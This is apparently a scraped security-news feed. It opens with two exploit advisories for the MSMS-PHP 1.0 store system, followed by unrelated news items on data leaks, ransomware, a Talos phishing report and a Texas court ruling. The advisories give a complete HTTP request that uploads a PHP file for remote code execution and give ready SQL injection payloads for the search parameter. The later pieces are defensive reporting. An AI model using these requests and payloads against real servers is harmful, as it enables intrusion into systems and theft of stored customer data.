MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

MSMS-PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.There is a change in response when nu11secur1ty' or 1=1# is injected.Potential SQLi detected. Please confirm it manually after you checkthe POST, GET, or other requests... The payload from thepuncher_SQLi_bypass_authentication module was submitted successfullyafter the test. The `search` parameter is vulnerable for Multiple SQLiattacks. The attacker can get all information from the system by usingthis vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: search (GET)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: p=products&search=-9068') OR 1 GROUP BYCONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: UNION query    Title: MySQL UNION query (random number) - 9 columns    Payload: p=products&search=-7515') UNION ALL SELECT2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:00:15:00

MSMS-PHP 1.0 SQL Injection

By Waqas
A massive data leak (585.81 GB) exposed customer information at Qmerit, including home images, charger locations, and potentially…
This is a post from HackRead.com Read the original post: Leading EV Charging Firm Spills Trove of Customer Info in Server Leak

A massive data leak (585.81 GB) exposed customer information at Qmerit, including home images, charger locations, and potentially more – Qmerit took immediate action to secure the data.

Cybersecurity researcher Jeremiah Fowler has uncovered a troubling data exposure incident, yet again drawing attention to broader concerns surrounding data security. Fowler, in collaboration with WebsitePlanet, uncovered a non-password-protected database containing over half a million records, including sensitive customer information and invoices from a prominent American EV services provider.

The exposed database, totalling 585.81 GB in size, contained a trove of documents such as work invoices, price proposals, electrical permits, and surveys, alongside customer-submitted information including images of their homes and charger location details.

According to Fowler’s **blog post**, upon investigation, he identified the data as belonging to Qmerit, a Texas-based company specializing in EV charging infrastructure installation and maintenance since 2016.

Following the responsible disclosure by Fowler, Qmerit swiftly took action to secure the exposed data and initiate an internal investigation. In response to the incident, Qmerit emphasized its commitment to prioritizing security and protecting Personally Identifiable Information (PII). However, the duration of the data exposure and potential unauthorized access remain uncertain, warranting further scrutiny through internal forensic audits.

Screenshot from the exposed records (Screenshot credit: Websiteplanet\_

Fowler clarified that his findings do not imply wrongdoing on Qmerit’s part or suggest imminent threats to customer or contractor safety. However, the incident must be taken as a lesson surrounding the importance of vital data protection measures in protecting customer privacy and maintaining trust in the market.

Despite this incident, Qmerit continues to position itself as a leading player in North America’s EV services industry, boasting partnerships with major automakers and a track record of over 269,000 EV charger installations.

1.  EV Charging Stations at Risk of DoS Attacks
2.  Navigating London’s Free Electric Car Charging Points
3.  Massive Cloud Database Leak Exposes 380 Million Records
4.  US Credit Union Service Leaks Millions of Records and Passwords
5.  Aussie Travel Agency Data Leak Puts Thousands of Tourists at Risk

Leading EV Charging Firm Spills Trove of Customer Info in Server Leak

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks.

Wednesday, March 13, 2024 08:00

*   Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft and session token theft during recent incident response and threat intelligence engagements.
*   Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate.
*   DDP sites allow adversaries to quickly deploy and decommission malicious documents on a single platform. Talos IR also observed an adversary move between DDP sites within a short period.

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks. Threat actors have used a similar tactic of deploying phishing lures on well-known cloud storage and contract management sites such as Google Drive, OneDrive, SharePoint, DocuSign and Oneflow. However, DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls. Recent malicious activity observed across these platforms underscores the need for security teams to ensure that phishing protections and user awareness training programs consider these and similar sites.

**Background and observations**

 “Digital Document Publishing sites” refers to websites that allow users to upload and share PDF files in a browser-based flipbook format. Visitors can view an entire PDF by flipping from page to page without downloading the document, and some DDP sites offer features that allow other types of interaction with the document. Examples of DDP sites include Publuu, Marq, FlipSnack, Issuu, FlippingBook, RelayTo and SimpleBooklet.

The sites discussed in this blog are not malicious. Rather, they are being abused by threat actors.

**Delivery mechanism**

Threat actors integrate DDP sites as a secondary or intermediate stage of the attack chain, which follows tried-and-true phishing methods.

*   The victim receives an email containing a link to a document hosted on a legitimate DDP site. The email’s subject and/or body often includes the phrase “New Document from \[sender organization\],” and leaves the “To” header blank. Instead, the actors load the target list into the “BCC” field.
*   The DDP-hosted document includes a link to an external, adversary-controlled site.
*   When clicked, the link either moves the victim directly to the adversary-controlled site, or through a series of redirects. Talos IR also observed the inclusion of Cloudflare CAPTCHAs as part of some redirects, an adversary technique reported by Cofense, Netskope and other security teams over the past six months.
*   The victim arrives at the adversary-controlled site, which mimics a legitimate authentication page and is designed to capture user credentials or session tokens during authentication.

Attacks leveraging DDP sites for credential and session token theft often take place through unauthorized access to another legitimate email inbox. In a sort of “cascading” business email compromise (BEC) process, the threat actor creates infrastructure and phishing lures to target a specific victim, then leverages that victim’s established connections to conduct follow-on attacks against other organizations. A portion of the infrastructure created for the original target may be reused, while other portions are recreated to increase the likelihood of success during the subsequent attacks. 

**Lure customization**

DDP sites offer custom capabilities that lend credence to a phishing attack. Not only can the threat actor customize the uploaded phishing document, the web page hosting that document can also be modified. Page customization options include changing the background, banner, border or HTML Title tag. These quick configurations create more convincing lures and are likely to garner a higher click-through rate to the credential harvesting page. 

DDP-hosted lure customization observed during investigation ranged from pages listing the organization name only in the HTML Title tag, to a highly customized lure and landing page combination targeting users of a Canadian telecom provider. In the latter case, the final credential harvesting page was a near replica of the provider’s legitimate user login page, though it was hosted on an unrelated webwave\[.\]dev subdomain. 

**Historical trends**

Expanding the scope of the investigation to include historical data reveals a possible trend where threat actors migrate between DDP sites or rapidly activate and deactivate similar campaigns on the same site over time. For example, Talos IR observed a cluster of activity on SimpleBooklet from late October to early November 2020, and another on RelayTo in early September 2023. More recently, an adversary was observed operating the same credential-harvesting attack, first on Publuu, then later Issuu. 

**Adversary advantages create challenges for defenders**

DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack. Given some of these advantages, threat actors may find DDP sites as useful as creating spoofed domains or compromising legitimate sites for phishing and credential theft.

**DDP sites offer low-cost, transient file hosting**

Many DDP sites offer either a free tier or a no-cost trial period where a defined number of files can be published for a limited time. No-cost trial periods usually require only limited personal identifiers and no payment methods. Threat actors can quickly and easily create multiple free accounts, with a varying number of malicious pages per account.

Some DDP sites also allow a link expiration to be set for published content. This feature creates a “set it and forget it” capability for threat actors, who are no longer required to closely track where phishing documents have been deployed so they can be decommissioned. Instead, a link expiration date and time is configured during page creation, ensuring the content will be rendered unavailable automatically, usually after only a short time.

Talos IR observed instances where an adversary launched, then disabled a DDP page in fewer than 24 hours, and others where the DDP page was left active but the final landing page on the adversary-controlled domain was removed through DNS fast fluxing or another mechanism.

This transient nature of DDP pages creates challenges for security teams and complicates the incident response process. While it’s possible to detect, create internal alerts for, and/or notify security personnel about a DDP-hosted lure, the brief availability of the pages creates a compressed response time for defenders. Understanding the theme of the lure, the associated adversary-controlled domains, and the intent of the attack in such a short time may be difficult, even for experienced security teams.

**DDP sites usually have a favorable web reputation.**

The ratio of legitimate to compromised pages hosted on DDP sites is likely quite low. While that ratio seemed to vary by DDP provider, Talos IR found that most pages created recently across all DDP sites hosted legitimate content. Unless this trend continues to shift toward hosting greater volumes of malicious content, these sites will maintain a favorable reputation score and are less likely to be included in automated blocklists. 

A favorable web reputation score may also mislead users who investigate the DDP site using popular open-source intelligence tools or a basic internet search, leading to higher click and credential capture rates than sites with an unknown or poor reputation.

**Site**

**Domain Registration**

**Umbrella Unique Visitors Score\***

**Umbrella Reputation Score\*\***

**Publuu**

2019-02-28 (IS)

63

53 (Medium Risk)

**Marq**

2004-06-19 (IS)

76

9 (Low Risk)

**FlipSnack**

2010-06-03 (US)

96

11 (Low Risk)

**Issuu**

2007-04-19 (GB)

100

9 (Low Risk)

**RelayTo**

2013-12-02 (US)

53

58 (Medium Risk)

_\* Umbrella’s Unique Visitors Score is included to illustrate estimated traffic volume per site as of Feb. 2, 2024._

_\*\* Reputation Score as of Feb. 2, 2024._

**DDP productivity features may inhibit malicious link detection.**

Talos IR found that productivity features on at least one DDP site inhibited traditional methods of extracting the true URL from a phishing link. During the investigation of a malicious document hosted on Publuu, a custom sub-menu was displayed when the user right-clicked on the URL. While this sub-menu included options that would benefit legitimate users, it did not provide a clear option to copy the URL behind the “View Online PDF” hyperlink. Further, no tooltip popups appeared to show the URL when hovering over the link. 

**Case studies**

Two recent Talos IR engagements involved the use of a DDP site as part of potential credential and session token-harvesting attacks.

**Publuu**

Several individuals at the targeted organization received phishing emails from a compromised email address belonging to a trusted third-party vendor with the subject, “New Document from \[third-party vendor\]”.

The link included in the body of the email led to a Publuu flipbook, with a URL like https://publuu[.]com/flip-book/[6_digit_identifier]/[6_digit_identifier]. The phishing document was a generic, widely used file observed in similar attacks on other DDP sites. However, while the phishing document was reused, the adversary had modified the Publuu page with the sender organization’s name to lend authenticity to the document.

Clicking the “VIEW ONLINE PDF” link directed the user to a Cloudflare CAPTCHA, a technique described in the publications by Cofense and Netskope linked above. Use of the CAPTCHA likely has a dual purpose, as it both protects the credential harvesting page from automated access while giving the impression of a legitimate site to users who fall victim to the phishing link.

After completing the CAPTCHA, the victim is directed to a convincing replica of a Microsoft 365 authentication page. The URL for the page contains a lengthy alphanumeric string, which may act as an identifier for the visitor. The adversary-controlled domain associated with the authentication page was atlas-aerspace[.]onlineextracted. The customization of the original Publuu page to the target organization in contrast to this unrelated spoofed domain suggests this incident may have been part of a cascading BEC attack.  

Talos IR later identified an attack chain hosted on the Issuu DDP site with similar indicators. The phishing document was nearly identical, though, unlike the Publuu link, this link URL leveraged the Google AMP to Cloudflare CAPTCHA flow described in the Cofense blog. The credential harvest page was ultimately located at the domain aerospace-atlas[.]online and included the same identifier-style URL string as the one observed with the atlas-aerspace[.]online90 days domain.

In aggregate, the following similar domains – all hosted by Cloudflare – were registered within 90 days. The first two domains were found to be associated with phishing lures hosted on DDP sites, suggesting an effort to target users of the legitimate atlas-aerospace[.]com domain.

*   aerospace-atlas[.]online (registered Jan. 24, 2024)
*   atlas-aerspace[.]online (registered Dec. 19, 2023)
*   atlas-aerspace[.]com (registered Oct. 25, 2023)

Talos provided notification through established channels so affected organizations could review and address this activity.

**Marq**

Talos IR also responded to an incident involving the Marq DDP site. The Marq page hosting the phishing document had already been deactivated, but Talos IR used other forensic data to determine the URL of the associated credential harvesting page. The first part of that URL was https[:]//mvnwsenterprise[.]top:443/aadcdn.msauth.net/.

While the Marq page could not be accessed, Talos IR identified similar pages through open- and closed-source intelligence. These pages were customized to show the sender organization in the HTML Title tag (displayed in the browser tab) but otherwise used an identical “Microsoft365 Online Fax” lure. Unlike some activity clusters on other DDP sites, each page was configured with a unique URL using the .top top-level domain, such as onedrivesmncs[.]top, onedrivemwsamc[.]top, and 347nsm239mws934[.]top. Another common characteristic was the presence of the URL query string tkmilric in all URLs embedded in the phishing document. 

Once clicked, the link passed the user to the spoofed Microsoft authentication page, which resided at the redirect.cgi path of the unique \`.top\` domain. The URL query string for this page included a “ref” parameter, which contained a Base64 and URL encoded value. An example of the decoded value is:

https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https://outlook.office.com/owa/&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code id_token&scope=openid&msafed=1&msaredir=1&client-request-id=**[REDACTED]**&protectedtoken=true&claims={"id_token":{"xms_cc":{"values":["CP1"]}}}&nonce=**[REDACTED]**&state=**[REDACTED]**

The value 00000002-0000-0ff1-ce00-000000000000 found in the client_id and resource parameters is the Microsoft Application ID for Office 365 Exchange Online. The claims string {"id_token":{"xms_cc":{"values":["CP1"]}}} is a required component for a client application to communicate its capabilities to Microsoft Entra ID in an OAuth 2.0 authorization flow. These characteristics likely indicate a campaign to capture session tokens for Microsoft 365 components using the same lure and customized or DGA-generated domains.

**Other DDP Sites**

Following these investigations, Talos IR identified similar activity on other DDP sites. The following examples are provided to demonstrate similarities across DDP sites and are not related to any ongoing or prior Talos IR investigations.

**Flipsnack**

Talos IR identified at least two lure formats used recently on FlipSnack – one eFax PDF-themed lure, and one SharePoint PDF-themed lure. Both landing pages had been removed by the adversary at the time of Talos IR’s review, but the URL for the adversary-controlled page associated with the SharePoint lure (afurrytailwedding[.]com/cure/MSthOffice/index.phpexcept) could indicate a potential Microsoft 365 credential harvesting effort. Neither lure had been customized to target a specific victim. 

**Issuu**

Malicious documents found on Issuu were very similar to those observed on Publuu, except for minor details like a “Reference” number and the link URL. Of the two links tested by Talos IR, one was redirected through an intermediary site before reaching the landing page. The other leveraged the Google AMP and Cloudflare CAPTCHA flow reported by Cofense. Again, the landing pages for both examples had been removed by the adversary at the time of Talos IR’s review.

**RelayTo**

Talos IR located at least two different phishing lures that had been deployed to the RelayTo site in early September 2023. One of these lures was published repeatedly from multiple RelayTo accounts with modifications to only the name of the associated organization. The link in each lure – https[:]//secure-docsx[.]com/efgh5678 – was the same. The secure-docsx[.]combefore the domain had been registered a week this activity began and was followed by the creation of the secure-docu[.]com domain, with which it shared registrant details.

**SimpleBooklet**

Talos IR could not locate a malicious page on the SimpleBooklet site that had not already been deactivated. However, a review of related URLs in VirusTotal suggests that an adversary made prolific use of this site for phishing and possible credential theft from October 2020 through January 2021.

**Defender actions**

Defenders should consider the following actions to help defend against phishing attacks that leverage DDP sites.

*   Block common DDP sites via border security devices, endpoint detection and response (EDR) like Cisco Secure Endpoint, web content filtering, and/or DNS security controls if access to these sites is not required for normal business operations. If blocking these sites will disrupt normal operations, develop a procedure to ensure malicious domains identified in DDP-hosted phishing lures can be quickly blocked.
*   Configure email security controls to detect and alert on links in emails containing common DDP site URLs.
*   Leverage threat intelligence to quickly identify newly created sites related to known threats – in this case, new DDP sites that may be leveraged by threat actors.
*   Monitor for behavioral trends within the organization’s internal environment that could indicate coordinated malicious activity, including activity to blocked sites.
*   Update user security awareness training to include information about DDP sites and other cloud-hosted phishing attack methods. Reinforce a “see something, say something” mentality when users are uncertain about a site’s legitimacy.

End users can also support defenders by remaining vigilant for documents shared over unusual or uncommon sites, even if those sites are legitimate and have a favorable reputation, and by following their organization’s guidelines for reporting suspicious emails.

Threat actors leverage document publishing sites for ongoing credential and session token theft

A global network of violent predators is hiding in plain sight, targeting children on major platforms, grooming them, and extorting them to commit horrific acts of abuse.

There Are Dark Corners of the Internet. Then There's 764

By Waqas
Some reports suggest that LockBit ransomware gang is behing the EquiLend data breach.
This is a post from HackRead.com Read the original post: EquiLend Employee Data Breached After January Ransomware Attack

EquiLend, a financial technology firm, experienced a data breach following a January ransomware attack – EquiLend is offering credit monitoring and identity theft protection to affected individuals.

Financial technology firm EquiLend recently disclosed a data breach reportedly originating from a January ransomware attack. The attack, which according to Bloomberg’s report, is attributed to the LockBit ransomware group, compromised the personal information of EquiLend employees.

The claim that LockBit ransomware is involved in the incident is concerning for businesses, as the group, despite its shutdown, has not only resurfaced but is already targeting new victims.

****Breach Details Emerge****

EquiLend initially reported a “technical issue” on January 24th, leading to service disruptions. The company later confirmed a ransomware attack but provided limited details. Recent notifications to affected individuals and authorities reveal the extent of the data breach.

****Employee Information Exposed****

According to the notification sent by the company to impacted customers, the attack compromised sensitive employee data, including names, dates of birth, Social Security numbers, and internal payroll information. EquiLend assures it has no evidence of this information being misused but is offering two years of complimentary credit monitoring and identity theft protection services to affected individuals.

****Ransomware Attack Scope Unclear****

While client-facing services were restored by February 5th, the full impact of the attack remains unclear. Speculation suggests EquiLend may have negotiated with the attackers, but the company has not confirmed any ransom payment.

It’s worth noting that at the time of writing, LockBit’s dark web leak site showed no mention of EquiLend. This could indicate that negotiations have occurred, or the group has yet to list EquiLend on their website.

****EquiLend Responds****

EquiLend is working with cybersecurity experts to investigate the incident and prevent future occurrences. The company emphasizes its commitment to data security and is urging affected individuals to remain vigilant and monitor their financial statements for suspicious activity.

****Experts Weigh In****

For insights, we reached out to Tamara Kirchleitner, Senior Intelligence Operations Analyst at Centripetal. “In the wake of this cyberattack, it’s a stark reminder of the relentless threat fintech firms face. Offering affected employees free identity theft protection is commendable, yet many companies remain reactive,” Tamara said.

“This incident underscores the need for proactive cybersecurity measures. Implementing robust protocols is imperative in today’s digital landscape. Businesses must embrace advanced technologies to safeguard their systems and customer data. It’s time for a paradigm shift towards anticipatory cybersecurity,” she warned.

****Importance of Cybersecurity****

This incident highlights the growing threat of ransomware attacks and the importance of strong cybersecurity measures. Financial institutions like EquiLend handle sensitive data, making them prime targets for cybercriminals.

EquiLend’s data breach should be a wakeup for organizations to prioritize data security investments and implement strong safeguards against cyberattacks.

1.  **FIN8 Resurfaces with New Sardonic Backdoor**
2.  **Hive Ransomware Resurfaces as Hunters International**
3.  **FBI Disrupts Chinese State-Backed Volt Typhoon’s KV Botnet**
4.  **Mirai botnet resurfaces with MooBot variant to target D-Link devices**
5.  **Nasty Mamba ransomware that encrypts entire hard drive resurfaces**

EquiLend Employee Data Breached After January Ransomware Attack

Identities are the latest sweet spot for cybercriminals, now heavily targeting SaaS applications that are especially vulnerable in this attack vector. 
The use of SaaS applications involves a wide range of identities, including human and non-human, such as service accounts, API keys, and OAuth authorizations. Consequently, any identity in a SaaS app can create an opening for cybercriminals to

Join Our Webinar on Protecting Human and Non-Human Identities in SaaS Platforms

A new phishing campaign has been observed delivering remote access trojans (RAT) such as VCURMS and STRRAT by means of a malicious Java-based downloader.
“The attackers stored malware on public services like Amazon Web Services (AWS) and GitHub, employing a commercial protector to avoid detection of the malware,” Fortinet FortiGuard Labs researcher Yurren Wan said.
An unusual aspect of the

Alert: Cybercriminals Deploying VCURMS and STRRAT Trojans via AWS and GitHub

The US Court of Appeals for the 5th Circuit has vacated an injunction against an age-verification requirement to view internet porn in Texas.

Texas can enforce a law requiring age-verification systems on porn websites, the US Court of Appeals for the 5th Circuit ruled Thursday. The appeals court vacated an injunction against the law's age-verification requirement but said that Texas cannot enforce a provision requiring porn websites to "display health warnings about the effects of the consumption of pornography."

In a 2-1 decision, judges ruled that "the age-verification requirement is rationally related to the government's legitimate interest in preventing minors' access to pornography. Therefore, the age-verification requirement does not violate the First Amendment."

The Texas law was challenged by the owners of Pornhub and other adult websites and an adult-industry lobby group called the Free Speech Coalition. "We disagree strenuously with the analysis of the Court majority," the Free Speech Coalition said. "As the dissenting opinion by Judge \[Patrick\] Higginbotham makes clear, this ruling violates decades of precedent from the Supreme Court."

A US District Court judge issued a preliminary injunction blocking enforcement of the law in August 2023, finding that "Plaintiffs have shown that their First Amendment rights will likely be violated if the statute takes effect, and that they will suffer irreparable harm absent an injunction."

But a few weeks later, the 5th Circuit issued a temporary stay that allowed the law to take effect in September 2023. The new ruling issued last week was on the merits of the preliminary injunction.

**Court Cites Magazine Precedent**

The 5th Circuit, generally regarded as one of the most conservative appeals courts, found that the Texas porn-site law should be reviewed on the "rational-basis" standard and not under strict scrutiny. The court panel majority pointed to _Ginsberg v. New York_, a 1968 Supreme Court ruling about the sale of "girlie" magazines to a 16-year-old at a lunch counter. The Supreme Court in that case upheld a New York criminal obscenity statute that prohibited the knowing sale of obscene materials to minors.

The same principle applies to the internet, the 5th Circuit majority found. "Because it is never obvious whether an Internet user is an adult or a child, any attempt to identify the user will implicate adults in some way... To suggest protecting children would be so difficult is inconsistent with _Ginsberg_, where rational basis review was sufficient _even though_ adults would presumably have to identify themselves to buy girlie magazines," the ruling said.

As Santa Clara University law professor Eric Goldman wrote, the 5th Circuit "panel majority claims the 56-year-old _Ginsberg_ opinion, which dealt with offline retailers, governs the Conlaw \[constitutional law\] analysis of the Texas law instead of the squarely on-point 1997 _Reno v. ACLU_ and 2004 _Ashcroft v. ACLU_ opinions, both of which dealt with the Internet."

In his dissent, Judge Higginbotham said the majority's attempts to distinguish _Ginsberg_ from later rulings "are unconvincing." Although "_Ginsberg_ remains good law and indubitably recognizes the government's power to protect children from age-inappropriate materials," the Supreme Court "has unswervingly applied strict scrutiny to content-based regulations that limit adults' access to protected speech," he wrote.

The Texas law "limits access to materials that may be denied to minors but remain constitutionally protected speech for adults," Higginbotham wrote. "It follows that the law must face strict scrutiny review because it limits adults' access to protected speech using a content-based distinction—whether that speech is harmful to minors."

**Section 230 Analysis Flawed, Professor Says**

The 5th Circuit panel majority found that Section 230 of the Communications Decency Act does not preempt the Texas law. Goldman called the decision "another entry in the Fifth Circuit's increasingly unstable Section 230 jurisprudence."

Goldman said that judges seem to be saying "that the age authentication mandate only regulates the services' conduct, and thus it doesn't impose liability for third-party content... However, fundamentally, the statute imposes liability for services for publishing third-party content to underage viewers, and Section 230 clearly should apply to that aspect."

Porn Sites Need Age-Verification Systems in Texas, Court Rules

A number of software brands are being impersonated with malicious ads and fake sites to distribute malware.

February was a particularly busy month for search-based malvertising with the number of incidents we documented almost doubling. We saw similar payloads being dropped but also a few new ones that were particularly good at evading detection.

